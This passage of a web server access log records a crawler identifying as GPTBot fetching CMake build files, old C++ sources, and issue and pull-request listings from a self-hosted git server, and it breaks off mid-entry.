"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15122] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13730] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11269] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:34:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:18:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:18:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13539] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12809] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15373] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:34:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:34:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:34:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:34:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py?display=rendered" [Client 74.7.227.38] [Length 11119] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:18:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&state=open&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:18:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" +[17/Feb/2026:18:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11784] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:18:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?state=open&type=all" [Client 74.7.227.38] [Length 9943] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" +[17/Feb/2026:18:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?state=open&type=all" [Client 74.7.227.38] [Length 10115] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:18:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:18:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:18:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:18:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:18:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11504] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11197] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&sort=latest&state=all&type=all" +[17/Feb/2026:18:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets?display=rendered" [Client 74.7.227.38] [Length 11197] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:18:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 